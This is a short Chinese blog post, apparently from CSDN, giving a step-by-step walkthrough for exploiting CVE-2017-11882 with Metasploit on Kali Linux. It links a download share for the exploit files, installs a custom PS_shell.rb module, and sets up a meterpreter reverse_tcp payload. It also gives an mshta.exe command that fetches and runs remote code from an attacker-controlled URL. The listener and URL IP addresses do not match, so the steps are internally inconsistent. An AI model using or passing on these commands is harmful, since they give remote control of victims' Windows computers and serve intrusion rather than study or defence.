CVE-2017-11882利用

利用kail的msf进行攻击,

首先打开kali,查看 IP,可以看到我的虚拟机kali的 IP是192.168.3.116。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就可以。接下来就要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一起吧。

所有用到的资源:链接:https://pan.baidu.com/s/1hPxpdnbH5ONt6W_zSmpqzQ 密码:298h

ms17-010.rb文件的路径是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把PS_shell.rb放smb下面,和ms17-010在一起。

准备工作做好了,接下来就是msf上场了。

输入msfconsole,然后reload_all,重新加载所有模块。

接下来输入命令:search PS_shell

use exploit/windows/smb/PS_shell

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.3.116

set uripath abc

exploit

会出现 started reverse tcp hander on 192.168.3.116:4444

using url,local ip,,,

mshta.exe "http://192.168.1.104:8080/abc"

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值